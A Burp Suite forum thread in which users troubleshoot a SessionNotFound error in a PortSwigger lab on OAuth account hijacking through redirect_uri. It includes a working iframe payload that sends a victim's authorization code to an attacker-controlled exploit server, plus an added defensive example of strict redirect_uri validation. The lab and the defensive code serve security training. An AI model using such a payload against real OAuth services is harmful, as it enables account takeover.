Burp Suite User Forum


Lab: OAuth account hijacking via redirect_uri: SessionNotFound

Antonin | Last updated: Jul 23, 2024 04:07AM UTC

Hi, In the lab titled "Lab: OAuth account hijacking via redirect_uri", I am unable to view the exploit when using the iframe payload on the exploit server. Instead, I get the error below inside the iframe:

```text
OAuth account hijacking via redirect_uri
Back to lab description
SessionNotFound: invalid_request
    at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
    at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
    at /home/carlos/oauth/index.js:160:34
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at setNoCache (/home/carlos/oauth/index.js:121:5)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
```

I tried yesterday, and today again. The lab had time to reset in between. Yet, the error is the same. I am following the instructions in the solution religiously. What am I doing wrong?

Ben, PortSwigger Agent | Last updated: Jul 23, 2024 08:40AM UTC

Hi Antonin, Just to clarify, which browser are you using when you attempt this lab?

Antonin | Last updated: Jul 25, 2024 07:40AM UTC

Hi Ben, I am using the native Chromium browser packed with Burp, always.

Antonin | Last updated: Jul 25, 2024 07:56AM UTC

Below is the payload for /exploit:

```html
<iframe src="https://oauth-0a1300f604b...028f00b9.oauth-server.net/auth?client_id=kfnckzp146a10r6ofmdvj&redirect_uri=https://exploit-0a7a00c4...f64ca01e700ba.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"></iframe>
```

Below is a screenshot of the iframe: https://snipboard.io/wDePNO.jpg
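The defensive counterpart to the redirect_uri in the payload above, added here as an example and not code from the lab or from oidc-provider: an authorization-endpoint check that accepts redirect_uri only on an exact match against the client's registered URIs, so a URI pointing at a different host, or at a path-traversal variant of the registered one, fails closed. The client_id, hostnames and the REGISTERED_CLIENTS table are constructed for illustration.

```javascript
// Constructed registration table: client_id -> exact redirect URIs allowed.
// The lab's real client_id and hostnames are deliberately not used here.
const REGISTERED_CLIENTS = {
  "client-abc": ["https://client.example/oauth-callback"],
};

// Parse the query string of an /auth request into a plain object.
// URLSearchParams decodes percent-encoding, so an unencoded redirect_uri
// like the one in the iframe payload above is handled the same way.
function parseAuthRequest(url) {
  const u = new URL(url);
  return Object.fromEntries(u.searchParams.entries());
}

// True only if redirect_uri, after URL normalisation, is byte-for-byte equal
// to one of the URIs registered for client_id. No prefix, substring or
// origin-only comparison: normalisation collapses "/../" segments, so a
// traversal variant of the registered path compares unequal and is refused.
function isRedirectUriAllowed(clientId, redirectUri) {
  const allowed = REGISTERED_CLIENTS[clientId];
  if (!allowed) return false;
  let parsed;
  try {
    parsed = new URL(redirectUri);
  } catch {
    return false; // unparseable value: fail closed
  }
  if (parsed.protocol !== "https:") return false;
  return allowed.includes(parsed.href);
}

// Decide whether the authorization server may continue with this request.
// A rejected request must be answered with an error page, never with a
// redirect to the supplied redirect_uri.
function checkAuthRequest(url) {
  const q = parseAuthRequest(url);
  if (!q.client_id || !q.redirect_uri) {
    return { ok: false, reason: "missing_parameter" };
  }
  if (!isRedirectUriAllowed(q.client_id, q.redirect_uri)) {
    return { ok: false, reason: "invalid_redirect_uri" };
  }
  return { ok: true, redirectUri: q.redirect_uri };
}
```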

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:06AM UTC

Hi Antonin, If you use a standard version of Chrome, do you still see this behaviour?

Jack | Last updated: Jul 27, 2024 09:48PM UTC

Same error with Chrome, Opera, Burp Browser and Firefox, newest version everywhere. Can you please go deeper and try to fix the issue even without replicating it? I am afraid that if you wait until you are able to replicate it, it will never be fixed, because usually you can't replicate it :( But some steps could be taken to prevent this even if you can't replicate it, please.

Jack | Last updated: Jul 27, 2024 09:49PM UTC

```text
SessionNotFound: invalid_request
    at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
    at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
    at /home/carlos/oauth/index.js:160:34
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at setNoCache (/home/carlos/oauth/index.js:121:5)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request]
```

Jack | Last updated: Jul 27, 2024 09:52PM UTC

Eventually I quit Burp Browser, opened the exploit server again, delivered, and it worked. Very strange bug.

2lfa | Last updated: Jul 28, 2024 12:06PM UTC

The issue can be worked around with a temporary fix; you can find the solution here: https://forum.portswigger.net/thread/oauth-account-hijacking-via-redirect-uri-works-with-chrome-but-not-using-burp-s-chromium-b5f18f8a
